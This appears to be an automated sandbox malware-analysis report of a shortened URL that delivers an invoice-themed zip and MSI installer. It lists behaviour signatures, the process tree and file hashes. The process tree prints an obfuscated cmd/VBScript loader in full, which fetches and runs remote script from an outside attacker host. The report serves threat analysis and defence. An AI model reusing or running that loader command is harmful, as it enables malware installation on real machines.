Overview

overview

8

Static

static

1

URLScan

urlscan

1

https://sprl.in/wCJr...

windows10-1703-x64

8

Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-1703_x64
  • resource
    win10-20240221-en
  • resource tags

    arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
  • submitted
    29-02-2024 03:41

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://sprl.in/wCJrEXQ

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://sprl.in/wCJrEXQ
    1⤵
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffb9a719758,0x7ffb9a719768,0x7ffb9a719778
      2⤵
        PID:4568
      • C:\Program Files\Google\Chrome\Application\chrome.exe
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:8
        2⤵
          PID:3956
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2064 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:8
          2⤵
            PID:2812
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1592 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:2
            2⤵
              PID:2120
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3064 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:1
              2⤵
                PID:4372
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2940 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:1
                2⤵
                  PID:3384
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4856 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:8
                  2⤵
                    PID:2296
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:8
                    2⤵
                      PID:2592
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:8
                      2⤵
                        PID:4432
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4640 --field-trial-handle=1744,i,15949990430172226316,2894791313942558586,131072 /prefetch:2
                        2⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:812
                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                      1⤵
                        PID:236
                      • C:\Windows\System32\rundll32.exe
                        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                        1⤵
                          PID:2292
                        • C:\Program Files\7-Zip\7zG.exe
                          "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\BD-FACTUR@100239005940059001059\" -spe -an -ai#7zMap5163:124:7zEvent15745
                          1⤵
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of FindShellTrayWindow
                          PID:764
                        • C:\Windows\System32\msiexec.exe
                          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\BD-FACTUR@100239005940059001059\[email protected]"
                          1⤵
                          • Enumerates connected drives
                          • Suspicious use of FindShellTrayWindow
                          PID:524
                        • C:\Windows\system32\msiexec.exe
                          C:\Windows\system32\msiexec.exe /V
                          1⤵
                          • Enumerates connected drives
                          • Drops file in Windows directory
                          • Suspicious behavior: EnumeratesProcesses
                          PID:2744
                          • C:\Windows\system32\srtasks.exe
                            C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                            2⤵
                              PID:1320
                            • C:\Windows\syswow64\MsiExec.exe
                              C:\Windows\syswow64\MsiExec.exe -Embedding E8B817B53F12A0DC4EFA084A25B738CF
                              2⤵
                              • Loads dropped DLL
                              PID:4072
                              • C:\Windows\syswow64\cmD.exe
                                cmD /V/D/c EcHo un2086g7=".":FunctIon w6a15vf5(q6d8yr85):fa4473=Array(":","t","r","c","1"):w6a15vf5=fa4473(q6d8yr85):end function:t8sl13="S"+w6a15vf5(3)+"rip"+w6a15vf5(1)+w6a15vf5(0)+"hT"+w6a15vf5(1)+"ps://contdskl"+un2086g7+"bounceme"+un2086g7+"net/g1":eval("Ge"+w6a15vf5(1)+"Obje"+w6a15vf5(3)+w6a15vf5(1)+"(t8sl13)")>nul>C:\Users\Public\^t888457.vbs&c:\windows\system32\cmd /c start C:\Users\Public\t888457.vbs
                                3⤵
                                  PID:888
                                  • \??\c:\windows\SysWOW64\cmd.exe
                                    c:\windows\system32\cmd /c start C:\Users\Public\t888457.vbs
                                    4⤵
                                    • Modifies registry class
                                    PID:4424
                                    • C:\Windows\SysWOW64\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Public\t888457.vbs"
                                      5⤵
                                      • Blocklisted process makes network request
                                      PID:2888
                            • C:\Windows\system32\vssvc.exe
                              C:\Windows\system32\vssvc.exe
                              1⤵
                                PID:3184
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                1⤵
                                • Checks SCSI registry key(s)
                                • Modifies data under HKEY_USERS
                                PID:4564

                              Network

                              MITRE ATT&CK Enterprise v15

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\34e34a21-7c49-465e-913e-966a3675235c.tmp
                                Filesize

                                5KB

                                MD5

                                728772d34c0b4ab010860411a06f0760

                                SHA1

                                1053b81d1433670a0a674e469cc9d343ef660778

                                SHA256

                                3e43e96aa51924cb8c4428a5431aa69711e0fa8d941cbf0403fb660d1aee9d4c

                                SHA512

                                d46545c9f54207a497414e0a9c0335c4d9e099771ec4b76923bc27774ad11ef416b9a2d8584d3172e869211a1005e260061cce4d627dfece45d79f663fbe27fb

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\59a45fbc-8c58-424b-9c3e-be0a70721d00.tmp
                                Filesize

                                1KB

                                MD5

                                e3bcc727e044f7fe41417d0fd0ad2851

                                SHA1

                                21d3f83f319d6fdfdc599df623b4db7fd67261c9

                                SHA256

                                0dfa54b44507b73a4187e491e7c591fec6367f641071cc7cfa9654001feec466

                                SHA512

                                101db052324ea19f19f7e62c6370bec8c7a36dd7b4f75584def0b5eabda22049fc64a58647514f0a2d9b0599b57e90694e21a280de476d61fafba58b75bb2176

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize

                                5KB

                                MD5

                                c9952997e2c8a0694875f4440eb72ffc

                                SHA1

                                9f021bc6c4ab979d6e299e32f25f23bf132aee0e

                                SHA256

                                237c660439112e439f2fb98ef562379bd43f84e19d15a3dbfb5b843921fe30dc

                                SHA512

                                986ddf125c2acca3718fe00565d34c48d8d6d3a74136d07642135c934e00397d098cd3e9054be167ecba0b57b58fcc22a449007ff82f128a47fa505cc0f9785f

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize

                                5KB

                                MD5

                                470fe7faadba406e90313e8dce0032c1

                                SHA1

                                76aafeed44be5dc09510454ee8ea7f927168cc88

                                SHA256

                                c0c185f1770884de872898185ca81d4b19ed24f0af6e7732e9f3755f0904a8a0

                                SHA512

                                765d2f0ffa425d208cc5a40b508b716bf8aaa420312ebee3912e205a8d23795aa230c273b58e333074fc7e2acb1c55e7832494a0ffafa4d5c1a3c9c4d1f7791c

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize

                                5KB

                                MD5

                                d3eeebafd54f8719d6cfe176bcbf0ef3

                                SHA1

                                996a4cbb25394e7fa5a2c045987ba07ebcd6be22

                                SHA256

                                cd9d4e12500de6bb8b6d29551a1bb5a39ce9ca1c4d1729f421b6aba9b8c395b7

                                SHA512

                                2faa73d59b74566e3ec0277af327e176056361fdd21ec38e401ff824d50cb30c49da96ccf1e555f69045c3e75e81833e4b2bf94e6130293b36a0c4a1695e9846

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
                                Filesize

                                5KB

                                MD5

                                be293a600fb723957c1b9d8afcafcebb

                                SHA1

                                482b72f10be02e448c2a3274d8efd0c6854f4803

                                SHA256

                                6477eb6e371f9b1a26330cb7838b191f842b3cb5c911c52cb326b183cb246a1f

                                SHA512

                                bdef5d773d8407a8ae938565bcaa17ea77c6335baea1dafe73605cae58ecae0d55df1cd31ade8a68eaa77b8b5b7803a5b7075758c76421482fe5625c50d8b5ac

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
                                Filesize

                                130KB

                                MD5

                                c6bfb7e4b2cf088aa25ac12c50de4abc

                                SHA1

                                66cce38564fcf3896f9bf0332534dc581901f000

                                SHA256

                                f42460117c18604132cd7e650c5571ddfea302e004ad2c18040f3e80135651fe

                                SHA512

                                764caec0a6e8a90e9a77fe2fe8fe4554d39a83e11d4fff2985729c1449c60f6f19f450f9caccc2fb879a94e8bc6cff143d9435279cb17c8b2505b03cdacfd70d

                                Download Submit

                              • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
                                Filesize

                                2B

                                MD5

                                99914b932bd37a50b983c5e7c90ae93b

                                SHA1

                                bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                SHA256

                                44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                SHA512

                                27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                Download Submit

                              • C:\Users\Admin\Downloads\[email protected]
                                Filesize

                                154KB

                                MD5

                                d2fb8c161c232ef7943740f27f65eae2

                                SHA1

                                dc85e20ebab8b72812ce49b748bb697d86a8ccb8

                                SHA256

                                35ca7e63d51f9106d68d0c2b3596185bc3eb4a89b7e5762c5122d0f018cbfa83

                                SHA512

                                52fb3cb43dc7b0a21d00bd29a0c03412b542df9581e60c87db6377dffb2b78d76f4b70f497c00c7246563d40a4795b4eea581284904aa534f7bfd3676ac7f388

                                Download Submit

                              • C:\Users\Admin\Downloads\BD-FACTUR@100239005940059001059\[email protected]
                                Filesize

                                341KB

                                MD5

                                1d590bf182dd15bc0c8fa1eee2bb1fa4

                                SHA1

                                04cc43c11560935e96afdd9842f994dc933160b3

                                SHA256

                                db8bfccb403f2a70b85907ef394e5f6dc4016dc6b87aa78f511e2106696b4be7

                                SHA512

                                e0c69e524fff576140e9c28db1a3d60e15c4105104ce5dd45b5ce11512b0d510b5d0ae2a533430657d13a9d636b0a2a402f049b0dd6aa876150b5bc9a251d483

                                Download Submit

                              • C:\Users\Public\t888457.vbs
                                Filesize

                                304B

                                MD5

                                0e63eb9e97eceb2cf3d132c6d8355c7a

                                SHA1

                                6d89c83139b571e09cc102bbc3b5b91084eb0bd0

                                SHA256

                                f0d5b4a3f784c66b68e0c03ae2f6b39cac924d8d98faf4d5757407263fc6ef4b

                                SHA512

                                4fd32a25290941e0e8b4357b9431c63341103c2f6c4e6792bb5811cc8aa184870c0f15981b4ea0675edb4aa4b3f2c45598d4a189c45c1e76c00e77a4a51e83dc

                                Download Submit

                              • C:\Windows\Installer\MSI915E.tmp
                                Filesize

                                353KB

                                MD5

                                e7a4d1bdbe112becf5dfeb1f5b7a6e03

                                SHA1

                                c4868652ebe1781a8e4a35121497fca1b5e5e812

                                SHA256

                                9f0168cff9d4726029ee9450c537b8bebf2ee29b9fb858a1b4c7aec2382ddf90

                                SHA512

                                4f7671e1627de817af534b06ad0c4f91e27292b7918ad761584053607ff3ce9f8b5be1aa2c657a38de2513ed29b9ffbbebeeb3667ffb6c0cff9bee9b0578d853

                                Download Submit

                              • \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                Filesize

                                22.5MB

                                MD5

                                3dbb3fef424875e9750ef9bc96927ec3

                                SHA1

                                c930b35f3ed891c577de7a11895af798031c6d9e

                                SHA256

                                7c6670466ae83858a0522a3937469edb620f35c07e4a50867138ed3f07745091

                                SHA512

                                eb6bdd6b3efd40d55a78de44658e257558f179c017808d9f9197b3e23e95d87108a17b30d5f3093f2905fa1b3b01160b26c711fd3031d92ca7482771303eb500

                                Download Submit

                              • \??\Volume{d468bc4b-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f2a37748-3323-4bb4-8ebd-b4d57759ed94}_OnDiskSnapshotProp
                                Filesize

                                5KB

                                MD5

                                d491ad90d1e8b8dcc30ba4ab9c26eaff

                                SHA1

                                b9804ba8b5a883112733a35b334c91cbab5047f0

                                SHA256

                                d98960d66b5b0ab9e63379814e3baa3bc8814c74929092f48b41647712e3f8be

                                SHA512

                                fe0a0951ba458abd2e71f3988c68e21d176da16fcfa0e952d299d3c0bb18046c125c389e128adacde2018651e09c9700ac96bf475e514847fd4a7b54309a88fb

                                Download Submit